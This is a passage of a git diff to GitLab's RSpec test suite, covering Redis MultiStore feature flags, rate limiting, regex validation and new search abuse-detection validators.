described_class.trap_signals(%i(INT HUP)) + end + end + + describe '.modify_signals' do + it 'traps the given signals with the given command' do + expect(described_class).to receive(:trap).ordered.with(:INT, 'DEFAULT') + expect(described_class).to receive(:trap).ordered.with(:HUP, 'DEFAULT') + + described_class.modify_signals(%i(INT HUP), 'DEFAULT') + end + end + + describe '.signal_processes' do + it 'sends a signal to every given process' do + expect(described_class).to receive(:signal).with(1, :INT) + + described_class.signal_processes([1], :INT) + end + end + + describe '.signal' do + it 'sends a signal to the given process' do + allow(Process).to receive(:kill).with(:INT, 4) + expect(described_class.signal(4, :INT)).to eq(true) + end + + it 'returns false when the process does not exist' do + allow(Process).to receive(:kill).with(:INT, 4).and_raise(Errno::ESRCH) + expect(described_class.signal(4, :INT)).to eq(false) + end + end + + describe '.wait_async' do + it 'waits for a process in a separate thread' do + thread = described_class.wait_async(Process.spawn('true')) + + # Upon success Process.wait just returns the PID. + expect(thread.value).to be_a_kind_of(Numeric) + end + end + + # In the X_alive? checks, we check negative PIDs sometimes as a simple way + # to be sure the pids are definitely for non-existent processes. + # Note that -1 is special, and sends the signal to every process we have permission + # for, so we use -2, -3 etc + describe '.all_alive?' do + it 'returns true if all processes are alive' do + processes = [Process.pid] + + expect(described_class.all_alive?(processes)).to eq(true) + end + + it 'returns false when a thread was not alive' do + processes = [-2] + + expect(described_class.all_alive?(processes)).to eq(false) + end + end + + describe '.process_alive?' do + it 'returns true if the process is alive' do + process = Process.pid + + expect(described_class.process_alive?(process)).to eq(true) + end + + it 'returns false when a thread was not alive' do + process = -2 + + expect(described_class.process_alive?(process)).to eq(false) + end + + it 'returns false when no pid is given' do + process = nil + + expect(described_class.process_alive?(process)).to eq(false) + end + end + + describe '.process_died?' do + it 'returns false if the process is alive' do + process = Process.pid + + expect(described_class.process_died?(process)).to eq(false) + end + + it 'returns true when a thread was not alive' do + process = -2 + + expect(described_class.process_died?(process)).to eq(true) + end + + it 'returns true when no pid is given' do + process = nil + + expect(described_class.process_died?(process)).to eq(true) + end + end + + describe '.pids_alive' do + it 'returns the pids that are alive, from a given array' do + pids = [Process.pid, -2] + + expect(described_class.pids_alive(pids)).to match_array([Process.pid]) + end + end + + describe '.any_alive?' do + it 'returns true if at least one process is alive' do + processes = [Process.pid, -2] + + expect(described_class.any_alive?(processes)).to eq(true) + end + + it 'returns false when all threads are dead' do + processes = [-2, -3] + + expect(described_class.any_alive?(processes)).to eq(false) + end + end + + describe '.write_pid' do + it 'writes the PID of the current process to the given file' do + handle = double(:handle) + + allow(File).to receive(:open).with('/dev/null', 'w').and_yield(handle) + + expect(handle).to receive(:write).with(Process.pid.to_s) + + described_class.write_pid('/dev/null') + end + end +end diff --git a/spec/lib/gitlab/quick_actions/dsl_spec.rb b/spec/lib/gitlab/quick_actions/dsl_spec.rb index f990abfb253..942d347424f 100644 --- a/spec/lib/gitlab/quick_actions/dsl_spec.rb +++ b/spec/lib/gitlab/quick_actions/dsl_spec.rb @@ -96,8 +96,8 @@ RSpec.describe Gitlab::QuickActions::Dsl do expect(dynamic_description_def.name).to eq(:dynamic_description) expect(dynamic_description_def.aliases).to eq([]) - expect(dynamic_description_def.to_h(OpenStruct.new(noteable: 'issue'))[:description]).to eq('A dynamic description for ISSUE') - expect(dynamic_description_def.execute_message(OpenStruct.new(noteable: 'issue'), 'arg')).to eq('A dynamic execution message for ISSUE passing arg') + expect(dynamic_description_def.to_h(double('desc', noteable: 'issue'))[:description]).to eq('A dynamic description for ISSUE') + expect(dynamic_description_def.execute_message(double('desc', noteable: 'issue'), 'arg')).to eq('A dynamic execution message for ISSUE passing arg') expect(dynamic_description_def.params).to eq(['The first argument', 'The second argument']) expect(dynamic_description_def.condition_block).to be_nil expect(dynamic_description_def.types).to eq([]) diff --git a/spec/lib/gitlab/rack_attack_spec.rb b/spec/lib/gitlab/rack_attack_spec.rb index 8f03905e08d..39ea02bad8b 100644 --- a/spec/lib/gitlab/rack_attack_spec.rb +++ b/spec/lib/gitlab/rack_attack_spec.rb @@ -5,8 +5,8 @@ require 'spec_helper' RSpec.describe Gitlab::RackAttack, :aggregate_failures do describe '.configure' do let(:fake_rack_attack) { class_double("Rack::Attack") } - let(:fake_rack_attack_request) { class_double("Rack::Attack::Request") } - let(:fake_cache) { instance_double("Rack::Attack::Cache") } + let(:fake_rack_attack_request) { class_double(Rack::Attack::Request) } + let(:fake_cache) { instance_double(Rack::Attack::Cache) } let(:throttles) do { @@ -27,9 +27,6 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do end before do - stub_const("Rack::Attack", fake_rack_attack) - stub_const("Rack::Attack::Request", fake_rack_attack_request) - allow(fake_rack_attack).to receive(:throttled_response=) allow(fake_rack_attack).to receive(:throttle) allow(fake_rack_attack).to receive(:track) @@ -37,6 +34,9 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do allow(fake_rack_attack).to receive(:blocklist) allow(fake_rack_attack).to receive(:cache).and_return(fake_cache) allow(fake_cache).to receive(:store=) + + fake_rack_attack.const_set('Request', fake_rack_attack_request) + stub_const("Rack::Attack", fake_rack_attack) end it 'extends the request class' do @@ -78,7 +78,7 @@ RSpec.describe Gitlab::RackAttack, :aggregate_failures do it 'configures tracks and throttles with a selected set of dry-runs' do dry_run_throttles = throttles.each_key.first(2) - regular_throttles = throttles.keys[2..-1] + regular_throttles = throttles.keys[2..] stub_env('GITLAB_THROTTLE_DRY_RUN', dry_run_throttles.join(',')) described_class.configure(fake_rack_attack) diff --git a/spec/lib/gitlab/rate_limit_helpers_spec.rb b/spec/lib/gitlab/rate_limit_helpers_spec.rb deleted file mode 100644 index ad0e2de1448..00000000000 --- a/spec/lib/gitlab/rate_limit_helpers_spec.rb +++ /dev/null @@ -1,50 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe Gitlab::RateLimitHelpers, :clean_gitlab_redis_rate_limiting do - let(:limiter_class) do - Class.new do - include ::Gitlab::RateLimitHelpers - - attr_reader :request - - def initialize(request) - @request = request - end - end - end - - let(:request) { instance_double(ActionDispatch::Request, request_method: 'GET', ip: '127.0.0.1', fullpath: '/') } - let(:class_instance) { limiter_class.new(request) } - - let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project) } - - describe '#archive_rate_limit_reached?' do - context 'with a user' do - it 'rate limits the user properly' do - 5.times do - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_falsey - end - - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_truthy - end - end - - context 'with an anonymous user' do - before do - stub_const('Gitlab::RateLimitHelpers::ARCHIVE_RATE_ANONYMOUS_THRESHOLD', 2) - end - - it 'rate limits with higher limits' do - 2.times do - expect(class_instance.archive_rate_limit_reached?(nil, project)).to be_falsey - end - - expect(class_instance.archive_rate_limit_reached?(nil, project)).to be_truthy - expect(class_instance.archive_rate_limit_reached?(user, project)).to be_falsey - end - end - end -end diff --git a/spec/lib/gitlab/redis/multi_store_spec.rb b/spec/lib/gitlab/redis/multi_store_spec.rb index bf1bf65bb9b..76731bb916c 100644 --- a/spec/lib/gitlab/redis/multi_store_spec.rb +++ b/spec/lib/gitlab/redis/multi_store_spec.rb @@ -27,6 +27,11 @@ RSpec.describe Gitlab::Redis::MultiStore do subject { multi_store.send(name, *args) } + before do + skip_feature_flags_yaml_validation + skip_default_enabled_yaml_check + end + after(:all) do primary_store.flushdb secondary_store.flushdb @@ -48,6 +53,15 @@ RSpec.describe Gitlab::Redis::MultiStore do end end + context 'when instance_name is nil' do + let(:instance_name) { nil } + let(:multi_store) { described_class.new(primary_store, secondary_store, instance_name)} + + it 'fails with exception' do + expect { multi_store }.to raise_error(ArgumentError, /instance_name is required/) + end + end + context 'when primary_store is not a ::Redis instance' do before do allow(primary_store).to receive(:is_a?).with(::Redis).and_return(false) @@ -114,6 +128,12 @@ RSpec.describe Gitlab::Redis::MultiStore do end RSpec.shared_examples_for 'fallback read from the secondary store' do + let(:counter) { Gitlab::Metrics::NullMetric.instance } + + before do + allow(Gitlab::Metrics).to receive(:counter).and_return(counter) + end + it 'fallback and execute on secondary instance' do expect(secondary_store).to receive(name).with(*args).and_call_original @@ -128,7 +148,7 @@ RSpec.describe Gitlab::Redis::MultiStore do end it 'increment read fallback count metrics' do - expect(multi_store).to receive(:increment_read_fallback_count).with(name) + expect(counter).to receive(:increment).with(command: name, instance_name: instance_name) subject end @@ -169,9 +189,9 @@ RSpec.describe Gitlab::Redis::MultiStore do allow(secondary_store).to receive(name).and_call_original end - context 'with feature flag :use_multi_store enabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: true) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) end context 'when reading from the primary is successful' do @@ -246,12 +266,38 @@ RSpec.describe Gitlab::Redis::MultiStore do end end - context 'with feature flag :use_multi_store is disabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: false) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) end - it_behaves_like 'secondary store' + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it_behaves_like 'secondary store' + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'execute on the primary instance' do + expect(primary_store).to receive(name).with(*args).and_call_original + + subject + end + + include_examples 'reads correct value' + + it 'does not execute on the secondary store' do + expect(secondary_store).not_to receive(name) + + subject + end + end end context 'with both primary and secondary store using same redis instance' do @@ -329,9 +375,9 @@ RSpec.describe Gitlab::Redis::MultiStore do allow(secondary_store).to receive(name).and_call_original end - context 'with feature flag :use_multi_store enabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store' do before do - stub_feature_flags(use_multi_store: true) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) end context 'when executing on primary instance is successful' do @@ -382,35 +428,57 @@ RSpec.describe Gitlab::Redis::MultiStore do end end - context 'with feature flag :use_multi_store is disabled' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do before do - stub_feature_flags(use_multi_store: false) + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) end - it 'executes only on the secondary redis store', :aggregate_errors do - expect(secondary_store).to receive(name).with(*expected_args) - expect(primary_store).not_to receive(name).with(*expected_args) + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'executes only on the secondary redis store', :aggregate_errors do + expect(secondary_store).to receive(name).with(*expected_args) + expect(primary_store).not_to receive(name).with(*expected_args) + + subject + end - subject + include_examples 'verify that store contains values', :secondary_store end - include_examples 'verify that store contains values', :secondary_store + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'executes only on the primary_redis redis store', :aggregate_errors do + expect(primary_store).to receive(name).with(*expected_args) + expect(secondary_store).not_to receive(name).with(*expected_args) + + subject + end + + include_examples 'verify that store contains values', :primary_store + end end end end end context 'with unsupported command' do + let(:counter) { Gitlab::Metrics::NullMetric.instance } + before do primary_store.flushdb secondary_store.flushdb + allow(Gitlab::Metrics).to receive(:counter).and_return(counter) end let_it_be(:key) { "redis:counter" } - subject do - multi_store.incr(key) - end + subject { multi_store.incr(key) } it 'executes method missing' do expect(multi_store).to receive(:method_missing) @@ -418,31 +486,75 @@ RSpec.describe Gitlab::Redis::MultiStore do subject end - it 'logs MethodMissingError' do - expect(Gitlab::ErrorTracking).to receive(:log_exception).with(an_instance_of(Gitlab::Redis::MultiStore::MethodMissingError), - hash_including(command_name: :incr, extra: hash_including(instance_name: instance_name))) + context 'when command is not in SKIP_LOG_METHOD_MISSING_FOR_COMMANDS' do + it 'logs MethodMissingError' do + expect(Gitlab::ErrorTracking).to receive(:log_exception).with(an_instance_of(Gitlab::Redis::MultiStore::MethodMissingError), + hash_including(command_name: :incr, extra: hash_including(instance_name: instance_name))) - subject + subject + end + + it 'increments method missing counter' do + expect(counter).to receive(:increment).with(command: :incr, instance_name: instance_name) + + subject + end end - it 'increments method missing counter' do - expect(multi_store).to receive(:increment_method_missing_count).with(:incr) + context 'when command is in SKIP_LOG_METHOD_MISSING_FOR_COMMANDS' do + subject { multi_store.info } - subject + it 'does not log MethodMissingError' do + expect(Gitlab::ErrorTracking).not_to receive(:log_exception) + + subject + end + + it 'does not increment method missing counter' do + expect(counter).not_to receive(:increment) + + subject + end end - it 'fallback and executes only on the secondary store', :aggregate_errors do - expect(secondary_store).to receive(:incr).with(key).and_call_original - expect(primary_store).not_to receive(:incr) + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'fallback and executes only on the secondary store', :aggregate_errors do + expect(primary_store).to receive(:incr).with(key).and_call_original + expect(secondary_store).not_to receive(:incr) - subject + subject + end + + it 'correct value is stored on the secondary store', :aggregate_errors do + subject + + expect(secondary_store.get(key)).to be_nil + expect(primary_store.get(key)).to eq('1') + end end - it 'correct value is stored on the secondary store', :aggregate_errors do - subject + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'fallback and executes only on the secondary store', :aggregate_errors do + expect(secondary_store).to receive(:incr).with(key).and_call_original + expect(primary_store).not_to receive(:incr) + + subject + end + + it 'correct value is stored on the secondary store', :aggregate_errors do + subject - expect(primary_store.get(key)).to be_nil - expect(secondary_store.get(key)).to eq('1') + expect(primary_store.get(key)).to be_nil + expect(secondary_store.get(key)).to eq('1') + end end context 'when the command is executed within pipelined block' do @@ -468,6 +580,96 @@ RSpec.describe Gitlab::Redis::MultiStore do end end + describe '#to_s' do + subject { multi_store.to_s } + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) + end + + it 'returns same value as primary_store' do + is_expected.to eq(primary_store.to_s) + end + end + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'returns same value as primary_store' do + is_expected.to eq(primary_store.to_s) + end + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'returns same value as primary_store' do + is_expected.to eq(secondary_store.to_s) + end + end + end + end + + describe '#is_a?' do + it 'returns true for ::Redis::Store' do + expect(multi_store.is_a?(::Redis::Store)).to be true + end + end + + describe '#use_primary_and_secondary_stores?' do + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: true) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_and_secondary_stores?).to be true + end + end + + context 'with feature flag :use_primary_and_secondary_stores_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_and_secondary_stores_for_test_store: false) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_and_secondary_stores?).to be false + end + end + end + + describe '#use_primary_store_as_default?' do + context 'with feature flag :use_primary_store_as_default_for_test_store is enabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: true) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_store_as_default?).to be true + end + end + + context 'with feature flag :use_primary_store_as_default_for_test_store is disabled' do + before do + stub_feature_flags(use_primary_store_as_default_for_test_store: false) + end + + it 'multi store is disabled' do + expect(multi_store.use_primary_store_as_default?).to be false + end + end + end + def create_redis_store(options, extras = {}) ::Redis::Store.new(options.merge(extras)) end diff --git a/spec/lib/gitlab/redis/sessions_spec.rb b/spec/lib/gitlab/redis/sessions_spec.rb index 7e239c08e9f..6ecbbf3294d 100644 --- a/spec/lib/gitlab/redis/sessions_spec.rb +++ b/spec/lib/gitlab/redis/sessions_spec.rb @@ -3,5 +3,90 @@ require 'spec_helper' RSpec.describe Gitlab::Redis::Sessions do - include_examples "redis_new_instance_shared_examples", 'sessions', Gitlab::Redis::SharedState + it_behaves_like "redis_new_instance_shared_examples", 'sessions', Gitlab::Redis::SharedState + + describe 'redis instance used in connection pool' do + before do + clear_pool + end + + after do + clear_pool + end + + context 'when redis.sessions configuration is not provided' do + it 'uses ::Redis instance' do + expect(described_class).to receive(:config_fallback?).and_return(true) + + described_class.pool.with do |redis_instance| + expect(redis_instance).to be_instance_of(::Redis) + end + end + end + + context 'when redis.sessions configuration is provided' do + it 'instantiates an instance of MultiStore' do + expect(described_class).to receive(:config_fallback?).and_return(false) + + described_class.pool.with do |redis_instance| + expect(redis_instance).to be_instance_of(::Gitlab::Redis::MultiStore) + end + end + end + + def clear_pool + described_class.remove_instance_variable(:@pool) + rescue NameError + # raised if @pool was not set; ignore + end + end + + describe '#store' do + subject(:store) { described_class.store(namespace: described_class::SESSION_NAMESPACE) } + + context 'when redis.sessions configuration is NOT provided' do + it 'instantiates ::Redis instance' do + expect(described_class).to receive(:config_fallback?).and_return(true) + expect(store).to be_instance_of(::Redis::Store) + end + end + + context 'when redis.sessions configuration is provided' do + let(:config_new_format_host) { "spec/fixtures/config/redis_new_format_host.yml" } + let(:config_new_format_socket) { "spec/fixtures/config/redis_new_format_socket.yml" } + + before do + redis_clear_raw_config!(Gitlab::Redis::Sessions) + redis_clear_raw_config!(Gitlab::Redis::SharedState) + allow(described_class).to receive(:config_fallback?).and_return(false) + end + + after do + redis_clear_raw_config!(Gitlab::Redis::Sessions) + redis_clear_raw_config!(Gitlab::Redis::SharedState) + end + + # Check that Gitlab::Redis::Sessions is configured as MultiStore with proper attrs. + it 'instantiates an instance of MultiStore', :aggregate_failures do + expect(described_class).to receive(:config_file_name).and_return(config_new_format_host) + expect(::Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(config_new_format_socket) + + expect(store).to be_instance_of(::Gitlab::Redis::MultiStore) + + expect(store.primary_store.to_s).to eq("Redis Client connected to test-host:6379 against DB 99 with namespace session:gitlab") + expect(store.secondary_store.to_s).to eq("Redis Client connected to /path/to/redis.sock against DB 0 with namespace session:gitlab") + + expect(store.instance_name).to eq('Sessions') + end + + context 'when MultiStore correctly configured' do + before do + allow(described_class).to receive(:config_file_name).and_return(config_new_format_host) + allow(::Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(config_new_format_socket) + end + + it_behaves_like 'multi store feature flags', :use_primary_and_secondary_stores_for_sessions, :use_primary_store_as_default_for_sessions + end + end + end end diff --git a/spec/lib/gitlab/regex_spec.rb b/spec/lib/gitlab/regex_spec.rb index 05f1c88a6ab..83f85cc73d0 100644 --- a/spec/lib/gitlab/regex_spec.rb +++ b/spec/lib/gitlab/regex_spec.rb @@ -264,23 +264,37 @@ RSpec.describe Gitlab::Regex do it { is_expected.not_to match('1.2.3') } end - describe '.conan_recipe_component_regex' do - subject { described_class.conan_recipe_component_regex } - - let(:fifty_one_characters) { 'f_a' * 17} - - it { is_expected.to match('foobar') } - it { is_expected.to match('foo_bar') } - it { is_expected.to match('foo+bar') } - it { is_expected.to match('_foo+bar-baz+1.0') } - it { is_expected.to match('1.0.0') } - it { is_expected.not_to match('-foo_bar') } - it { is_expected.not_to match('+foo_bar') } - it { is_expected.not_to match('.foo_bar') } - it { is_expected.not_to match('foo@bar') } - it { is_expected.not_to match('foo/bar') } - it { is_expected.not_to match('!!()()') } - it { is_expected.not_to match(fifty_one_characters) } + context 'conan recipe components' do + shared_examples 'accepting valid recipe components values' do + let(:fifty_one_characters) { 'f_a' * 17} + + it { is_expected.to match('foobar') } + it { is_expected.to match('foo_bar') } + it { is_expected.to match('foo+bar') } + it { is_expected.to match('_foo+bar-baz+1.0') } + it { is_expected.to match('1.0.0') } + it { is_expected.not_to match('-foo_bar') } + it { is_expected.not_to match('+foo_bar') } + it { is_expected.not_to match('.foo_bar') } + it { is_expected.not_to match('foo@bar') } + it { is_expected.not_to match('foo/bar') } + it { is_expected.not_to match('!!()()') } + it { is_expected.not_to match(fifty_one_characters) } + end + + describe '.conan_recipe_component_regex' do + subject { described_class.conan_recipe_component_regex } + + it_behaves_like 'accepting valid recipe components values' + it { is_expected.not_to match('_') } + end + + describe '.conan_recipe_user_channel_regex' do + subject { described_class.conan_recipe_user_channel_regex } + + it_behaves_like 'accepting valid recipe components values' + it { is_expected.to match('_') } + end end describe '.package_name_regex' do diff --git a/spec/lib/gitlab/relative_positioning/range_spec.rb b/spec/lib/gitlab/relative_positioning/range_spec.rb index c3386336493..da1f0166d5d 100644 --- a/spec/lib/gitlab/relative_positioning/range_spec.rb +++ b/spec/lib/gitlab/relative_positioning/range_spec.rb @@ -3,8 +3,10 @@ require 'spec_helper' RSpec.describe Gitlab::RelativePositioning::Range do - item_a = OpenStruct.new(relative_position: 100, object: :x, positioned?: true) - item_b = OpenStruct.new(relative_position: 200, object: :y, positioned?: true) + position_struct = Struct.new(:relative_position, :object, :positioned?) + + item_a = position_struct.new(100, :x, true) + item_b = position_struct.new(200, :y, true) before do allow(item_a).to receive(:lhs_neighbour) { nil } @@ -90,12 +92,12 @@ RSpec.describe Gitlab::RelativePositioning::Range do end describe '#cover?' do - item_c = OpenStruct.new(relative_position: 150, object: :z, positioned?: true) - item_d = OpenStruct.new(relative_position: 050, object: :w, positioned?: true) - item_e = OpenStruct.new(relative_position: 250, object: :r, positioned?: true) - item_f = OpenStruct.new(positioned?: false) - item_ax = OpenStruct.new(relative_position: 100, object: :not_x, positioned?: true) - item_bx = OpenStruct.new(relative_position: 200, object: :not_y, positioned?: true) + item_c = position_struct.new(150, :z, true) + item_d = position_struct.new(050, :w, true) + item_e = position_struct.new(250, :r, true) + item_f = position_struct.new(positioned?: false) + item_ax = position_struct.new(100, :not_x, true) + item_bx = position_struct.new(200, :not_y, true) where(:lhs, :rhs, :item, :expected_result) do [ diff --git a/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb b/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb new file mode 100644 index 00000000000..49df70f3cb3 --- /dev/null +++ b/spec/lib/gitlab/repository_archive_rate_limiter_spec.rb @@ -0,0 +1,56 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Gitlab::RepositoryArchiveRateLimiter do + let(:described_class) do + Class.new do + include ::Gitlab::RepositoryArchiveRateLimiter + + def check_rate_limit!(**args) + end + end + end + + describe "#check_archive_rate_limit!" do + let(:project) { instance_double('Project') } + let(:current_user) { instance_double('User') } + let(:check) { subject.check_archive_rate_limit!(current_user, project) } + + context 'when archive_rate_limit feature flag is disabled' do + before do + stub_feature_flags(archive_rate_limit: false) + end + + it 'does not check rate limit' do + expect(subject).not_to receive(:check_rate_limit!) + + expect(check).to eq nil + end + end + + context 'when archive_rate_limit feature flag is enabled' do + before do + stub_feature_flags(archive_rate_limit: true) + end + + context 'when current user exists' do + it 'checks for project_repositories_archive rate limiting with default threshold' do + expect(subject).to receive(:check_rate_limit!) + .with(:project_repositories_archive, scope: [project, current_user], threshold: nil) + check + end + end + + context 'when current user does not exist' do + let(:current_user) { nil } + + it 'checks for project_repositories_archive rate limiting with threshold 100' do + expect(subject).to receive(:check_rate_limit!) + .with(:project_repositories_archive, scope: [project, current_user], threshold: 100) + check + end + end + end + end +end diff --git a/spec/lib/gitlab/saas_spec.rb b/spec/lib/gitlab/saas_spec.rb new file mode 100644 index 00000000000..1be36a60a97 --- /dev/null +++ b/spec/lib/gitlab/saas_spec.rb @@ -0,0 +1,13 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Saas do + describe '.canary_toggle_com_url' do + subject { described_class.canary_toggle_com_url } + + let(:next_url) { 'https://next.gitlab.com' } + + it { is_expected.to eq(next_url) } + end +end diff --git a/spec/lib/gitlab/search/abuse_detection_spec.rb b/spec/lib/gitlab/search/abuse_detection_spec.rb new file mode 100644 index 00000000000..a18d28456cd --- /dev/null +++ b/spec/lib/gitlab/search/abuse_detection_spec.rb @@ -0,0 +1,114 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseDetection do + subject { described_class.new(params) } + + let(:params) {{ query_string: 'foobar' }} + + describe 'abusive scopes validation' do + it 'allows only approved scopes' do + described_class::ALLOWED_SCOPES.each do |scope| + expect(described_class.new(scope: scope)).to be_valid + end + end + + it 'disallows anything not approved' do + expect(described_class.new(scope: 'nope')).not_to be_valid + end + end + + describe 'abusive character matching' do + refs = %w( + main + тест + maiñ + main123 + main-v123 + main-v12.3 + feature/it_works + really_important! + 测试 + ) + + refs.each do |ref| + it "does match refs permitted by git refname: #{ref}" do + [:repository_ref, :project_ref].each do |param| + validation = described_class.new(Hash[param, ref]) + expect(validation).to be_valid + end + end + + it "does NOT match refs with special characters: #{ref}" do + ['?', '\\', ' '].each do |special_character| + [:repository_ref, :project_ref].each do |param| + validation = described_class.new(Hash[param, ref + special_character]) + expect(validation).not_to be_valid + end + end + end + end + end + + describe 'numericality validation' do + it 'considers non Integers to be invalid' do + [:project_id, :group_id].each do |param| + [[1, 2, 3], 'xyz', 3.14, { foo: :bar }].each do |dtype| + expect(described_class.new(param => dtype)).not_to be_valid + end + end + end + + it 'considers Integers to be valid' do + [:project_id, :group_id].each do |param| + expect(described_class.new(param => 123)).to be_valid + end + end + end + + describe 'query_string validation' do + using ::RSpec::Parameterized::TableSyntax + + subject { described_class.new(query_string: search) } + + let(:validation_errors) do + subject.validate + subject.errors.messages + end + + where(:search, :errors) do + described_class::STOP_WORDS.each do |word| + word | { query_string: ['stopword only abusive search detected'] } + end + + 'x' | { query_string: ['abusive tiny search detected'] } + ('x' * described_class::ABUSIVE_TERM_SIZE) | { query_string: ['abusive term length detected'] } + '' | {} + '*' | {} + 'ruby' | {} + end + + with_them do + it 'validates query string for pointless search' do + expect(validation_errors).to eq(errors) + end + end + end + + describe 'abusive type coercion from string validation' do + it 'considers anything not a String invalid' do + [:query_string, :scope, :repository_ref, :project_ref].each do |param| + [[1, 2, 3], 123, 3.14, { foo: :bar }].each do |dtype| + expect(described_class.new(param => dtype)).not_to be_valid + end + end + end + + it 'considers Strings to be valid' do + [:query_string, :repository_ref, :project_ref].each do |param| + expect(described_class.new(param => "foo")).to be_valid + end + end + end +end diff --git a/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb b/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb new file mode 100644 index 00000000000..76280e65867 --- /dev/null +++ b/spec/lib/gitlab/search/abuse_validators/no_abusive_coercion_from_string_validator_spec.rb @@ -0,0 +1,35 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseValidators::NoAbusiveCoercionFromStringValidator do + subject do + described_class.new({ attributes: { foo: :bar } }) + end + + let(:instance) { double(:instance) } + let(:attribute) { :attribute } + let(:validation_msg) { 'abusive coercion from string detected' } + let(:validate) { subject.validate_each(instance, attribute, attribute_value) } + + using ::RSpec::Parameterized::TableSyntax + + where(:attribute_value, :valid?) do + ['this is an arry'] | false + { 'this': 'is a hash' } | false + 123 | false + 456.78 | false + 'now this is a string' | true + end + + with_them do + it do + if valid? + expect(instance).not_to receive(:errors) + else + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + end +end diff --git a/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb b/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb new file mode 100644 index 00000000000..67409d9b628 --- /dev/null +++ b/spec/lib/gitlab/search/abuse_validators/no_abusive_term_length_validator_spec.rb @@ -0,0 +1,71 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::AbuseValidators::NoAbusiveTermLengthValidator do + subject do + described_class.new({ attributes: { foo: :bar }, maximum: limit, maximum_for_url: url_limit }) + end + + let(:limit) { 100 } + let(:url_limit) { limit * 2 } + let(:instance) { double(:instance) } + let(:attribute) { :search } + let(:validation_msg) { 'abusive term length detected' } + let(:validate) { subject.validate_each(instance, attribute, search) } + + context 'when a term is over the limit' do + let(:search) { "this search is too lo#{'n' * limit}g" } + + it 'adds a validation error' do + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + + context 'when all terms are under the limit' do + let(:search) { "what is love? baby don't hurt me" } + + it 'does NOT add any validation errors' do + expect(instance).not_to receive(:errors) + validate + end + end + + context 'when a URL is detected in a search term' do + let(:double_limit) { limit * 2 } + let(:terms) do + [ + 'http://' + 'x' * (double_limit - 12) + '.com', + 'https://' + 'x' * (double_limit - 13) + '.com', + 'sftp://' + 'x' * (double_limit - 12) + '.com', + 'ftp://' + 'x' * (double_limit - 11) + '.com', + 'http://' + 'x' * (double_limit - 8) # no tld is OK + ] + end + + context 'when under twice the limit' do + let(:search) { terms.join(' ') } + + it 'does NOT add any validation errors' do + search.split.each do |term| + expect(term.length).to be < url_limit + end + + expect(instance).not_to receive(:errors) + validate + end + end + + context 'when over twice the limit' do + let(:search) do + terms.map { |t| t + 'xxxxxxxx' }.join(' ') + end + + it 'adds a validation error' do + expect(instance).to receive_message_chain(:errors, :add).with(attribute, validation_msg) + validate + end + end + end +end diff --git a/spec/lib/gitlab/search/params_spec.rb b/spec/lib/gitlab/search/params_spec.rb new file mode 100644 index 00000000000..6d15337b872 --- /dev/null +++ b/spec/lib/gitlab/search/params_spec.rb @@ -0,0 +1,136 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Search::Params do + subject { 